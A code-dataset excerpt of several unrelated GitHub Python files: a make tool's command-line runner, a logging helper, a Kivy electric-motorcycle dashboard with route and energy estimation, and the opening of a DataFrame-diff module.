*parallel* == True, a requirement set is run in parallel.\n\n \"\"\"\n kwargs['exc_event'] = exc_event = Event()\n for order_set in reversed(orders):\n if parallel:\n threads = [Thread(target=task.run, kwargs=kwargs)\n for task in order_set]\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n else:\n for task in order_set:\n task.run(**kwargs)\n if exc_event.is_set():\n raise Exception(\"At least one order failed in this set. No more \"\n \"orders will be excecuted.\")\n\n\ndef make(trgt, rules, env={}, **kwargs):\n \"\"\"Construct the dependency graph and run it.\"\"\"\n for rule in rules:\n rule.update_env(env)\n root, graph = build_dep_graph(trgt, rules)\n orders, newest_order_update = build_orders(root, graph)\n run_orders(orders, **kwargs)\n\n\ndef visualize_graph(trgt, rules, outpath):\n \"\"\"Draw a figure representing the dependency graph.\n\n By default writes the graph to a file named the same as the calling\n script.\n\n \"\"\"\n import pydot\n root, graph = build_dep_graph(trgt, rules)\n orders, newester_order_update = build_orders(root, graph)\n dot = pydot.Dot(graph_name=\"Dependency\", graph_type='digraph',\n labelloc='r', rankdir=\"BT\")\n dot.set_node_defaults(shape='ellipse', fontsize=24)\n for req in graph:\n for preq in graph[req]:\n dot.add_edge(pydot.Edge(preq.target, req.target))\n for rank, rank_reqs in enumerate(reversed(orders), 1):\n rank_plate = pydot.Cluster(graph_name=str(rank),\n label=\"Order set {r}\".format(r=rank))\n for req in rank_reqs:\n rank_plate.add_node(pydot.Node(req.target))\n dot.add_subgraph(rank_plate)\n return dot.write_png(outpath)\n\n\ndef maker(rules):\n\n # Name the logger after the calling module\n import __main__\n global LOG\n LOG = logging.getLogger(__main__.__file__)\n\n usage = \"usage: %prog [options] [TARGET]\"\n parser = optparse.OptionParser(usage=usage)\n parser.add_option(\"-q\", \"--quiet\", action=\"store_const\",\n const=0, dest=\"verbose\",\n help=(\"don't print recipes. \"\n \"DEFAULT: print recipes\"))\n parser.add_option(\"-v\", \"--verbose\", action=\"count\",\n dest=\"verbose\", default=1,\n help=(\"print recipes. \"\n \"Increment the logging level by 1. \"\n \"DEFAULT: verbosity level 1 ('INFO')\"))\n parser.add_option(\"-n\", \"--dry\", action=\"store_false\",\n dest=\"execute\", default=True,\n help=(\"Dry run. Don't execute the recipes. \"\n \"DEFAULT: execute recipes\"))\n parser.add_option(\"--figure\", dest=\"fig_outpath\",\n help=(\"Visualize the graph.\"))\n parser.add_option(\"-p\", \"--parallel\", action=\"store_true\",\n dest=\"parallel\", default=True,\n help=(\"execute the recipes in parallel processes. \"\n \"DEFAULT: parallel\"))\n parser.add_option(\"-s\", \"--series\", \"--not-parallel\",\n action=\"store_false\", dest=\"parallel\", default=True,\n help=(\"execute the recipes in series. \"\n \"DEFAULT: parallel\"))\n parser.add_option(\"-V\", \"--var\", \"--additional-var\", dest=\"env_items\",\n default=[], action=\"append\",\n nargs=2, metavar=\"[KEY] [VALUE]\",\n help=(\"add the desired variable to the environment. \"\n \"Additional variables can be passed with \"\n \"more '-V' flags. Variables passed in this \"\n \"fasion override variables defined in any other \"\n \"way\"))\n parser.add_option(\"-d\", \"--debug\", dest=\"debug\",\n default=False, action=\"store_true\",\n help=(\"display full debug messages with headers. \"\n \"DEFAULT: False\"))\n opts, args = parser.parse_args()\n\n if opts.debug:\n logging.basicConfig(level=logging.DEBUG, format=(\"(%(thread)s):\"\n \"%(name)s:\"\n \"%(levelname)s:\"\n \"%(asctime)s\\t\"\n \"%(message)s\"))\n else:\n logging.basicConfig(level=[logging.ERROR,\n logging.INFO,\n logging.DEBUG][opts.verbose],\n format=\"%(message)s\")\n\n\n if len(args) == 1:\n target = args[0]\n elif len(args) == 0:\n # If no target specified, use the first target. This will not take\n # into account environmental variables passed with the '-V' flag.\n target = rules[0].get_target()\n else:\n ValueError(\"Wrong number of positional arguments passed to pymake.\")\n if opts.fig_outpath:\n visualize_graph(target, rules, opts.fig_outpath)\n make(target, rules, env=dict(opts.env_items), verbose=opts.verbose,\n execute=opts.execute, parallel=opts.parallel)\n","repo_name":"bsmith89/pymake-old","sub_path":"lib/pymake.py","file_name":"pymake.py","file_ext":"py","file_size_in_byte":21501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4484790909","text":"# -*- coding:utf-8 -*-\n# @Time :2019/11/8 0008 13:03\n# @Author :wulin\n# @Mail :286075568@qq.com\n# @FileName: logging.py\n# @Software: PyCharm\n\nimport logging, time\n\n\n# 日志收集器\n\nclass MyLog:\n def __init__(self, log_name):\n self.log_name = log_name # 日志收集器的名字\n\n def my_log(self, msg, level):\n logger = logging.getLogger(self.log_name)\n logger.setLevel('DEBUG') # 包含INFO级别在内以及以上的日志\n # 格式:决定我们日志输出格式\n formatter = logging.Formatter('%(asctime)s-%(levelname)s-%(filename)s-%(name)s-日志信息:%(message)s')\n # 2日志输出器 控制台、指定的文件\n ch = logging.StreamHandler() # 渠道是指输出到控制台\n ch.setLevel('DEBUG') # 只输出INFO以上的\n ch.setFormatter(formatter)\n\n now = time.strftime('%Y-%m-%d') # 获取到当天的时间\n path = \"./test_result/log_txt/ydh_api_\" + now + \".txt\" # 拼接路径\n # 最终日志存放的地方\n fh = logging.FileHandler(path, encoding='UTF-8')\n fh.setLevel('DEBUG')\n fh.setFormatter(formatter)\n # 3 对接\n logger.addHandler(ch)\n logger.addHandler(fh)\n\n if level == 'DEBUG':\n logger.debug(msg)\n elif level == 'INFO':\n logger.info(msg)\n elif level == 'WARNING':\n logger.warning(msg)\n elif level == 'ERROR':\n logger.error(msg)\n elif level == 'CRITICAL':\n logger.critical(msg)\n\n logger.removeHandler(ch)\n logger.removeHandler(fh)\n\n def debug(self, msg):\n self.my_log(msg, 'DEBUG')\n\n def info(self, msg):\n self.my_log(msg, 'INFO')\n\n def warning(self, msg):\n self.my_log(msg, 'WARNING')\n\n def error(self, msg):\n self.my_log(msg, 'ERROR')\n\n def critical(self, msg):\n self.my_log(msg, 'CRITICAL')\n","repo_name":"wl55387370/ydh_inter3.0","sub_path":"common/outlog.py","file_name":"outlog.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"462323553","text":"from kivymd.app import MDApp\nfrom kivy.core.window import Window\nfrom kivymd.uix.dialog import MDDialog\nfrom kivy.uix.screenmanager import RiseInTransition,FadeTransition, ScreenManager, Screen\nfrom time import strftime\nfrom math import *\nfrom subprocess import Popen, PIPE, STDOUT\nfrom kivy.clock import Clock\nfrom kivy.graphics import Color, Line, SmoothLine\nfrom kivy.graphics.context_instructions import Translate, Scale\nfrom kivy_garden.speedmeter import SpeedMeter\nfrom kivy_garden.qrcode import QRCodeWidget\nfrom kivy_garden.mapview.utils import clamp\nfrom kivy_garden.mapview import MapView, MapMarker , MapLayer\nfrom kivy_garden.mapview.constants import (\n CACHE_DIR,\n MAX_LATITUDE,\n MAX_LONGITUDE,\n MIN_LATITUDE,\n MIN_LONGITUDE,\n)\nfrom kivymd_extensions.akivymd import *\nimport os\nimport requests\nimport joblib\nimport requests\nimport json\n\n#Clock.max_iteration = 50\n# from kivy.config import Config\n# Config.set('graphics', 'width', '800')\n# Config.set('graphics', 'height', '480')\n# Config.write()\n\nWindow.borderless = True\n#Window.size=(800,480)\n#Window.fullscreen = True\nWindow.maximize()\n\nclass Dashboard(MDApp):\n sw_started= False\n sw_seconds = 0\n val = \"\"\n tuj = \"\"\n icon = 'logo.svg'\n #global screen_manager\n screen_manager = ScreenManager()\n jarak_tempuh_total = 0\n def build(self):\n self.theme_cls.theme_style = \"Dark\"\n self.theme_cls.primary_palette = \"BlueGray\"\n self.theme_cls.primary_hue = \"500\" \n self.title=\"EVOLION\"\n\n \n return MyLayout()\n\n def on_start(self):\n\n self.root.ids.screen_manager.switch_to(self.root.ids.splashScreen)\n self.subScreen = Clock.schedule_once(self.changeScreen,9)\n \n self.root.ids.power_switch.active=True\n self.jarak_sebelumnya = 0\n signal = False\n\n SOC = 2\n self.SOC = SOC\n self.root.ids.SOC_bar.value = SOC\n SOC_text = str(SOC)+\" V\"\n # SOC_text = \"TEGANGAN : \"+str(SOC)+\" V\"\n self.root.ids.tegangan_value_text.text = SOC_text\n SOC_value = round((SOC/3)*100, 0)\n SOC_value = str(SOC_value)+\"%\"\n\n self.sub1 = Clock.schedule_interval(self.update_status, 5) #(program, interval/waktu dijalankan)\n self.sub2 = Clock.schedule_interval(self.update_data, 1)\n self.sub3 = Clock.schedule_interval(self.odometer, 1)\n self.sub4 = Clock.schedule_interval(self.odometer_submit, 5)\n self.sub5 = Clock.schedule_interval(self.turn_signal, 2)\n self.asyncRun = Clock.schedule_once(self.asyncProgram, 10)\n\n\n def asyncProgram(self,dt):\n Popen(\"python data_communication.py\", shell=True);\n # Popen(\"python rfcomm_server.py\", shell=True);\n\n def changeScreen(self,dt):\n self.root.ids.screen_manager.transition = RiseInTransition()\n self.root.ids.screen_manager.switch_to(self.root.ids.mainScreen)\n\n #update data SOC dan kecepatan\n def update_data(self,nap):\n # tegangan = 0.00\n strtegangan = \"0.0\"\n if self.sw_started:\n self.sw_seconds += nap\n\n try:\n dt = open('database/tegangan.json')\n data_tegangan = json.load(dt)\n strtegangan = data_tegangan['tegangan']\n except:\n strtegangan = \"0.00\"\n\n SOC_text = strtegangan +\" V\"\n # SOC_text = \"TEGANGAN : \"+ strtegangan +\" V\"\n self.root.ids.tegangan_value_text.text = SOC_text\n valtegangan = float(strtegangan)\n if valtegangan >= 71:\n SOC_value = round(80+((valtegangan-71)/0.7),1)\n elif valtegangan <= 60:\n SOC_value = round(0,1)\n # SOC_value = round(30-((60-valtegangan)/2),1)\n else:\n SOC_value = round(80-((70-valtegangan)/0.1125),1)\n # if valtegangan >= 7:\n # SOC_value = round(20+((valtegangan-7)/2.5),1)\n # elif valtegangan <= 6:\n # SOC_value = round(10-((6-valtegangan)/0.6),1)\n # else:\n # SOC_value = round(20-((7-valtegangan)/0.1),1)\n\n # SOC_value = round((float(strtegangan)/3)*100, 1)\n # self.root.ids.SOC_bar.current_percent = 20\n self.root.ids.SOC_bar.current_percent = SOC_value\n self.SOC_value = str(SOC_value)+\"%\"\n\n #kecepatan\n try: \n dk = open('database/kecepatan.json')\n data_kecepatan = json.load(dk)\n self.kecepatan = data_kecepatan['kecepatan']\n except:\n self.kecepatan = \"0.00\"\n\n kecepatan = (float(self.kecepatan)/6)*188.4*0.036\n kecepatan = (format(float(kecepatan), \".0f\"))\n\n #maksimal kecepatan\n if int(kecepatan) >= 121:\n kecepatan = 120\n\n # print(kecepatan)\n self.root.ids.speed_bar.value = kecepatan\n speeds = str(kecepatan)\n self.root.ids.speed_bar_value.text = speeds\n speed_value = \"%s km/h\" %(speeds)\n # self.root.ids.speed_value.text = speed_value\n\n # self.root.ids.progress_relative.current_percent = 20\n\n\n def odometer(self,nap):\n # tegangan = 0.00\n #odo = \"0.0\"\n if self.sw_started:\n self.sw_seconds += nap \n jarak_tempuh = (float(self.kecepatan)/6)*188.4*0.00001\n self.jarak_tempuh_total_lima = jarak_tempuh + self.jarak_sebelumnya\n self.jarak_sebelumnya = jarak_tempuh\n\n def odometer_submit(self,nap):\n # tegangan = 0.00\n #odo = \"0.0\"\n if self.sw_started:\n self.sw_seconds += nap\n\n try:\n opdata = open('database/odometer.json')\n data = json.load(opdata)\n odo = data['total_km']\n except Exception as e:\n print('odo error :',str(e) )\n \n \n self.jarak_tempuh_total = float(odo)\n #jarak_tempuh = format(float(jarak_tempuh), \".0f\")\n self.jarak_tempuh_total = self.jarak_tempuh_total + self.jarak_tempuh_total_lima\n # self.jarak_tempuh_total = self.jarak_tempuh_total + jarak_tempuh\n \n self.total_odo = format(float(self.jarak_tempuh_total), \".3f\")\n self.root.ids.odometer.text = format(float(self.total_odo), \".3f\")\n # except:\n odometer = {\n \"total_km\": self.total_odo\n }\n # except:\n # pass\n \n try:\n if len(str(data)) != 0:\n file = \"database/odometer.json\"\n with open(file, 'w') as file_object: \n json.dump(odometer, file_object, indent=4)\n # print(data_json)\n else:\n print(\"Time out! Exit.\\n\")\n pass\n except:\n pass\n # pass\n # odo = \"0.123\"\n \n # try:\n \n def turn_signal(self, nap):\n if self.sw_started:\n self.sw_seconds += nap\n\n fv = open(\"database/vehicle_info.json\")\n vehicleStatus = json.load(fv)\n isTurnLeft = vehicleStatus[\"turn_signal\"][0]\n isTurnRight = vehicleStatus[\"turn_signal\"][1]\n\n if isTurnLeft == True:\n self.root.ids.turn_left.text_color = 255/255,255/255,255/255,1\n Clock.schedule_once(self.blink_signal, 1)\n elif isTurnRight == True:\n self.root.ids.turn_right.text_color = 255/255,255/255,255/255,1\n Clock.schedule_once(self.blink_signal, 1)\n else:\n self.root.ids.turn_left.text_color = 15/255,18/255,23/255,1\n\n def blink_signal(self, *args):\n self.root.ids.turn_left.text_color = 15/255,18/255,23/255,1\n self.root.ids.turn_right.text_color = 15/255,18/255,23/255,1\n\n \n\n def update_status(self, nap):\n if self.sw_started:\n self.sw_seconds += nap\n #tambah detik = :%S\n #self.root.ids.SOC_value.text = \"blok\"\n self.root.ids.time.text = strftime('[b]%H:%M |[/b]')\n\n if (self.root.ids.power_switch.active == False):\n os.system(\"killall python\")\n\n\n fd = open('database/connection.json')\n connectionFile = json.load(fd)\n wifiID = connectionFile['wifi']['id']\n password = connectionFile['wifi']['pass']\n restartConnect = connectionFile['restart'] \n #print (tujuan)\n\n if len(wifiID) == 0:\n self.root.ids.bluetooth_status.text_color = 15/255,18/255,23/255,1\n else:\n if len(password) == 0:\n pass\n else:\n #code disini\n self.root.ids.bluetooth_status.text_color = 255/255,255/255,255/255,1\n if self.val != wifiID:\n try:\n self.root.connect(wifiID, password)\n self.val = wifiID\n #test = sub.out\n except:\n print(\"gagal untuk menyambungkan\")\n pass\n elif restartConnect == True:\n Clock.schedule_once(self.root.connect(wifiID, password), 1)\n\n else:\n pass\n \n fe = open('database/estimation.json')\n estimationFile = json.load(fe)\n tujuanLat = estimationFile['address']['tujuan']['latitude']\n tujuanLng = estimationFile['address']['tujuan']['longitude']\n\n\n if len(tujuanLat) == 0:\n pass\n else:\n if self.tuj != tujuanLat:\n try:\n #fungsi tujuan\n try:\n self.root.ids.mapview.remove_widget(self.root.marker)\n except:\n pass\n\n try:\n self.root.estimasi(tujuanLat,tujuanLng, self.SOC_value)\n except Exception as e:\n print('estimation error :',str(e) )\n \n self.root.center_maps()\n self.root.ids.screendget_mini.switch_to(self.root.ids.s_mini2)\n self.root.ids.screendget.switch_to(self.root.ids.test2)\n self.root.ids.menubar_left.switch_to(self.root.ids.menubar_leftTop2)\n self.root.ids.mode_label.text = \"JARAK\"\n self.root.ids.suhu_label.text = \"WAKTU\"\n self.root.ids.card_label.text = \"REKOMENDASI\"\n self.tuj = tujuanLat\n print(\"selesai\")\n except Exception as e:\n print('function error :',str(e) )\n else:\n pass\n \n\n\nclass MyLayout(Screen):\n\n def __init__(self, *args, **kwargs):\n super(MyLayout,self).__init__(*args,**kwargs)\n\n this_path = str(os.getcwd())\n path = this_path+\"/.key/api-key.txt\"\n API_file = open(path,\"r\")\n print(API_file)\n self.API_key = API_file.read()\n API_file.close()\n\n def move_menubar_left2(self):\n \n self.ids.menubar_left.switch_to(self.ids.menubar_leftTop2)\n\n def move_menubar_left1(self):\n self.ids.menubar_left.switch_to(self.ids.menubar_leftTop1)\n \n def move_maps(self):\n #self.ids.screendget.remove_widget(self.ids.test1)\n \n self.ids.screendget.switch_to(self.ids.test2)\n \n def center_maps(self):\n try:\n mapview = self.ids.mapview\n line = LineMapLayer(self.lat, self.lng, self.OriginLat, self.OriginLng)\n mapview.add_layer(line, mode='scatter')\n mapview.center_on(self.OriginLat, self.OriginLng)\n #marker1 = MapMarkerPopup(lat=lat, lon=lng) \n\n except Exception as e:\n print(\"error center map:\", str(e))\n\n try:\n self.marker_origin = MapMarker(lat=self.OriginLat, lon=self.OriginLng, source=\"marker-3-24.png\")\n self.marker_destination = MapMarker(lat=self.lat, lon=self.lng, source=\"marker-red.png\")\n mapview.add_widget(self.marker_origin)\n mapview.add_widget(self.marker_destination)\n Clock.schedule_once(self.zoom_maps, 12)\n #mapview.add_marker(lat=lat, lon=lng)\n except Exception as e:\n print(\"error marker map:\", str(e))\n \n def zoom_maps(self, *args):\n mapview = self.ids.mapview\n mapview.zoom = 15\n \n def move_speed(self):\n self.ids.screendget.switch_to(self.ids.test1)\n\n # def move_graph(self):\n # self.ids.screendget.switch_to(self.ids.test3, direction='left')\n \n def connect(self, name, password):\n try:\n self.commandl = \"nmcli dev wifi connect \"+name+\" password \"+password\n # print (\"success connection : \",sub.out)\n # print (self.command1)\n scan = os.popen(\"nmcli device wifi list --rescan yes\").read()\n isConnect = os.popen(self.commandl).read()\n # isConnect = True\n except:\n isConnect = \"\";\n \n if isConnect != \"\":\n self.popup = MDDialog(title='terhubung dengan internet \\n wifi id : '+name,\n radius=[7, 7, 7, 7],\n md_bg_color=(25/255,135/255,84/255,1),\n size_hint=(None, None), size=(400, 400))\n self.root.ids.wifi_status.icon = \"wifi-on\"\n self.root.ids.wifi_status.text_color = 255/255,255/255,255/255,1\n self.popup.open()\n else:\n self.popup = MDDialog(title='tidak dapat terhubung dengan internet',\n text=\"kirim wifi id dan password kembali\",\n radius=[7, 7, 7, 7],\n md_bg_color=(244/255,67/255,54/255,1),\n size_hint=(None, None), size=(400, 400))\n self.popup.open()\n # self.sub(self.commandl)\n \n # function to display avavilabe Wifi networks \n # def displayAvailableNetworks(self):\n # self.commandl = \"nmcli dev wifi\"\n # self.sub(self.commandl)\n\n\n # def sub(self,command):\n # self.proc = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)\n # (out, err) = self.proc.communicate()\n # print (\"program output : \", out)\n # print (\"error : \",err)\n \n def move_s_mini1(self):\n self.ids.screendget_mini.switch_to(self.ids.s_mini1)\n\n\n def move_s_mini2(self):\n self.ids.screendget_mini.switch_to(self.ids.s_mini2)\n\n def estimasi(self, destinationLat, destinationLng, SOC_value):\n # lay = MyLayout()\n #path_to_kv_file = \"test.kv\"\n #gmaps = googlemaps.Client(key=API_key)\n \n scaler = joblib.load('std_rev1.bin')\n model = joblib.load('estimasi_rev1.pkl')\n\n self.lat = destinationLat\n self.lng = destinationLng\n self.OriginLat = -7.2849060923904085\n self.OriginLng = 112.7961434972626\n # self.lat = -7.277094626336178\n # self.lng = 112.7974416864169\n body = {\"locations\":[[self.OriginLng,self.OriginLat],[self.lng,self.lat]],\"metrics\":[\"distance\",\"duration\"],\"units\":\"km\"}\n headers = {\n 'Accept': 'application/json, application/geo+json, application/gpx+xml, img/png; charset=utf-8',\n 'Authorization': self.API_key,\n 'Content-Type': 'application/json; charset=utf-8'\n }\n post_matrix = requests.post('https://api.openrouteservice.org/v2/matrix/driving-car', json=body, headers=headers)\n\n try:\n data_matrix = json.loads(post_matrix.text)\n duration = data_matrix['durations'][0][1]\n TrueDistance = data_matrix['distances'][0][1]\n self.ids.DummyDistance.text = str(TrueDistance) + \" km\"\n self.ids.DummyTimeEst.text = str(duration) + \" s\"\n except Exception as e:\n print('INVALID REQUEST DISTANCE :',str(e) )\n \n headers = {\n 'Accept': 'application/json, application/geo+json, application/gpx+xml, img/png; charset=utf-8',\n }\n get_geocode_origin = requests.get('https://api.openrouteservice.org/geocode/reverse?api_key='+self.API_key+'&point.lon='+str(self.OriginLng)+'&point.lat='+str(self.OriginLat)+'&size=2', headers=headers)\n get_geocode_destination = requests.get('https://api.openrouteservice.org/geocode/reverse?api_key='+self.API_key+'&point.lon='+str(self.lng)+'&point.lat='+str(self.lat)+'&size=2', headers=headers)\n\n try:\n geocode_origin = json.loads(get_geocode_origin.text)\n geocode_destination = json.loads(get_geocode_destination.text)\n place_name_origin = geocode_origin[\"features\"][0][\"properties\"][\"label\"]\n place_name_destination = geocode_destination[\"features\"][0][\"properties\"][\"label\"]\n self.ids.lokasi_label.text = \"ASAL : %s\\nTUJUAN : %s\" %(place_name_origin,place_name_destination)\n # print(call.status_code, call.reason)\n print(place_name_destination)\n except Exception as e:\n print('INVALID REQUEST DISTANCE :',str(e) )\n\n try:\n SOC_value = self.ids.SOC_bar.current_percent\n print(\"SOC : \",SOC_value)\n SOC = SOC_value\n # SOC = SOC_value.replace(\"%\",\"\")\n print(float(SOC))\n eco = 45\n normal = 60\n sport = 70\n speedmode = [eco, normal, sport]\n except Exception as e:\n print('INVALID STORING DATA :',str(e) )\n \n\n try:\n length = TrueDistance\n for x in speedmode:\n coba = [[float(SOC), float(x), float(length)]]\n data = scaler.transform(coba)\n test = model.predict(data)\n print(\"estimasi pemakaian energi : \",float(x),float(test))\n if (float(SOC) - (3/100)*5 <= float(test)):\n if x == eco:\n estimasi_eco = \"TIDAK CUKUP\"\n elif x == normal:\n estimasi_normal = \"TIDAK CUKUP\"\n elif x == sport:\n estimasi_sport = \"TIDAK CUKUP\"\n\n elif (float(SOC) - (3/100)*5 > float(test)):\n if x == eco:\n estimasi_eco = \"CUKUP\"\n elif x == normal:\n estimasi_normal = \"CUKUP\"\n elif x == sport:\n estimasi_sport = \"CUKUP\"\n # satu rekomendasi\n self.ids.recommendation.text = str(estimasi_normal)\n self.popup = MDDialog(title='Estimasi berhasil',\n text= 'ECO : '+estimasi_eco+'\\nNORMAL :'+estimasi_normal+'\\nSPORT :'+estimasi_sport,\n radius=[7, 7, 7, 7],\n md_bg_color=(25/255,135/255,84/255,1),\n size_hint=(None, None), size=(400, 400))\n self.popup.open()\n except Exception as e:\n print('estimation error ni :',str(e) )\n self.popup = MDDialogMap(title='Estimasi gagal',\n text= 'pastikan kendaraan terkoneksi dengan internet',\n radius=[7, 7, 7, 7],\n md_bg_color=(244/255,67/255,54/255,1),\n size_hint=(None, None), size=(400, 400))\n self.popup.open()\n\n # tiga rekomendasi\n # self.ids.recommendation.text = \"ECO : %s\\n\\nNORMAL : %s\\n\\nSPORT : %s\" %(estimasi_eco, estimasi_normal, estimasi_sport)\n\n\n\nclass MDDialog(MDDialog):\n \n def __init__(self, **kwargs):\n super(MDDialog, self).__init__(**kwargs)\n # call dismiss_popup in 2 seconds\n Clock.schedule_once(self.dismiss_popup, 7)\n\n def dismiss_popup(self, *args):\n self.dismiss()\n\nclass MDDialogMap(MDDialog):\n \n def __init__(self, **kwargs):\n super(MDDialog, self).__init__(**kwargs)\n # call dismiss_popup in 2 seconds\n Clock.schedule_once(self.dismiss_popup, 12)\n\n def dismiss_popup(self, *args):\n self.dismiss() \n \n \n\nclass LineMapLayer(MapLayer):\n def __init__(self,lat,lng,OriginLat,OriginLng, **kwargs):\n super(LineMapLayer, self).__init__(**kwargs)\n\n this_path = str(os.getcwd())\n path = this_path+\"/.key/api-key.txt\"\n API_file = open(path,\"r\")\n print(API_file)\n self.API_key_map = API_file.read()\n API_file.close()\n #self.zoom = 16\n\n url = \"https://api.openrouteservice.org/v2/directions/driving-car?&api_key=\"+self.API_key_map\n\n #testing Dummies\n #-7.289612, 112.796190\n\n start = \"&start=\"+str(OriginLng)+\",\"+str(OriginLat)\n end = \"&end=\"+str(lng)+\",\"+str(lat)\n\n final = url + start + end\n payload={}\n headers = {\n 'Accept': 'application/json, application/geo+json, application/gpx+xml, img/png; charset=utf-8',\n }\n\n response = requests.request(\"GET\", final, headers=headers, data=payload)\n hasil = json.loads(response.text)\n polyCoordinates = hasil['features'][0]['geometry']['coordinates']\n\n\n self._coordinates = [[polyCoordinates[0][1], polyCoordinates[0][0]]]\n for i in range(1, len(polyCoordinates)):\n # self.points =polyCoordinates[i-1], polyCoordinates[i]\n self.points =(polyCoordinates[i][1], polyCoordinates[i][0])\n self._coordinates.append(self.points)\n self._line_points = None\n self._line_points_offset = (0, 0)\n self.zoom = 9\n \n \n # geo_dover = [51.126251, 1.327067]\n # geo_calais = [50.959086, 1.827652]\n \n # # NOTE: Points must be valid as they're no longer clamped\n # self.coordinates = [geo_dover, geo_calais]\n # for i in range(25000-2):\n # self.coordinates.append(self.gen_point())\n @property\n def coordinates(self):\n return self._coordinates\n @coordinates.setter\n def coordinates(self, coordinates):\n self._coordinates = coordinates\n self.invalidate_line_points()\n self.clear_and_redraw()\n\n @property\n def line_points(self):\n if self._line_points is None:\n self.calc_line_points()\n return self._line_points\n\n @property\n def line_points_offset(self):\n if self._line_points is None:\n self.calc_line_points()\n return self._line_points_offset\n @property\n def line_points_offset(self):\n if self._line_points is None:\n self.calc_line_points()\n return self._line_points_offset\n def calc_line_points(self):\n # Offset all points by the coordinates of the first point, to keep coordinates closer to zero.\n # (and therefore avoid some float precision issues when drawing lines)\n self._line_points_offset = (self.get_x(self.coordinates[0][1]), self.get_y(self.coordinates[0][0]))\n # Since lat is not a linear transform we must compute manually\n self._line_points = [(self.get_x(lon) - self._line_points_offset[0], self.get_y(lat) - self._line_points_offset[1]) for lat, lon in self.coordinates]\n\n\n\n def invalidate_line_points(self):\n self._line_points = None\n self._line_points_offset = (0, 0)\n \n def get_x(self, lon):\n \"\"\"Get the x position on the map using this map source's projection\n (0, 0) is located at the top left.\n \"\"\"\n return clamp(lon, MIN_LONGITUDE, MAX_LONGITUDE) *self.ms /360.\n \n def get_y(self, lat):\n \"\"\"Get the y position on the map using this map source's projection\n (0, 0) is located at the top left.\n \"\"\"\n lat = radians(clamp(-lat, MIN_LATITUDE, MAX_LATITUDE))\n return ((1.0 - log(tan(lat) + 1.0 / cos(lat)) / pi )) *self.ms /2.0\n \n def reposition(self):\n mapview = self.parent\n\n # Must redraw when the zoom changes\n # as the scatter transform resets for the new tiles\n if (self.zoom != mapview.zoom):\n map_source = mapview.map_source\n self.ms = pow(2.0, mapview.zoom) * map_source.dp_tile_size\n self.invalidate_line_points()\n self.clear_and_redraw()\n\n def clear_and_redraw(self, *args):\n with self.canvas:\n # Clear old line\n self.canvas.clear()\n\n # FIXME: Why is 0.05 a good value here? Why does 0 leave us with weird offsets?\n Clock.schedule_once(self._draw_line, 0.05) \n def _draw_line(self, *args):\n mapview = self.parent\n self.zoom = 12\n self.zoom = mapview.zoom\n \n # When zooming we must undo the current scatter transform\n # or the animation distorts it\n scatter = mapview._scatter\n sx,sy,ss = scatter.x, scatter.y, scatter.scale\n vx,vy,vs = mapview.viewport_pos[0], mapview.viewport_pos[1], mapview.scale\n \n # Account for map source tile size and mapview zoom\n \n #: Since lat is not a linear transform we must compute manually \n line_points = []\n for lat,lon in self.coordinates:\n line_points.extend((self.get_x(lon),self.get_y(lat)))\n #line_points.extend(mapview.get_window_xy_from(lat,lon,mapview.zoom))\n \n \n with self.canvas:\n # Clear old line\n self.canvas.clear()\n \n # Undo the scatter animation transform\n Translate(*mapview.pos)\n Scale(1/ss,1/ss,1)\n Translate(-sx,-sy)\n \n # Apply the get window xy from transforms\n Scale(vs,vs,1)\n Translate(-vx,-vy)\n \n # Apply the what we can factor out of the mapsource long, lat to x, y conversion\n Translate(self.ms / 2, 0)\n\n # Translate by the offset of the line points (this keeps the points closer to the origin)\n Translate(*self.line_points_offset)\n\n \n # Draw new\n Color(31/255,146/255,161/255,1 )\n Line(points=self.line_points, width=6/2, joint=\"round\")#4/ms)#6., joint=\"round\",joint_precision=100)\n Color(146/255,218/255,241/255,1)\n Line(points=self.line_points, width=4 / 2)\n \n\nclass NoValueSpeedMeter(SpeedMeter):\n\n def value_str(self, n): return ''\n\n_displayed = { \n 0: '0',\n 30: u'\\u03a0 / 6', 60: u'\\u03a0/3', 90: u'\\u03a0/2', 120: u'2\\u03a0/3',\n 150: u'5\\u03a0/6',\n 180: u'\\u03a0', 210: u'7\\u03a0/6', 240: u'4\\u03a0/3'\n }\n \ndef reset():\n import kivy.core.window as window\n from kivy.base import EventLoop\n if not EventLoop.event_listeners:\n from kivy.cache import Cache\n window.Window = window.core_select_lib('window', window.window_impl, True)\n Cache.print_usage()\n for cat in Cache._categories:\n Cache._objects[cat] = {} \n\n#MyLayout.estimasi.has_been_called = False\n# lay = MyLayout()\nreset()\nDashboard().run()\nos.system(\"sudo killall python\")\n\n##ifi = Popen(\"python3 testing.py\", shell=True);\n#stdout = blu.communicate()\n#blu_val = blu.stdout.read()\n#print(blu_val)\n","repo_name":"XRayrahman/smart-dashboard_motorcycle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26884,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"21656981563","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n:Purpose: This module provides DataFrame differencing logic.\r\n\r\n The caller creates an instance which accepts the two DataFrames\r\n to be compared as the arguments. When the\r\n :meth:`~DataFrameDiff.diff` method is called, a list of columns\r\n containing value mismatches is compiled. Then, the list of column\r\n mismatches is iterated with each value in the column being\r\n compared. All value mismatches are reported to the terminal.\r\n\r\n:Platform: Linux/Windows | Python 3.6+\r\n:Developer: J Berendt\r\n:Email: support@s3dev.uk\r\n\r\n:Note: It's worth noting that current functionality **does not\r\n check data types**, unlike the pandas ``pd.DataFrame.equals()``\r\n method. This functionality may be added in a future release.\r\n\r\n:Example:\r\n\r\n Short example for differencing two DataFrames::\r\n\r\n >>> from utils4 import dfdiff\r\n\r\n >>> d = dfdiff.DataFrameDiff(df_source, df_test)\r\n >>> d.diff()\r\n\r\n\"\"\"\r\n# pylint: disable=wrong-import-order\r\n\r\nimport pandas as pd\r\nfrom itertools import zip_longest\r\ntry:\r\n from .user_interface import ui\r\nexcept ImportError: # pragma: nocover\r\n from user_interface import ui\r\n\r\n\r\nclass _Messages:\r\n \"\"\"This private class handles the messaging for DataFrame differencing.\"\"\"\r\n\r\n _FMT = '{:<10}\\t{:<10}\\t{:<25}\\t{:<25}'\r\n\r\n @staticmethod\r\n def 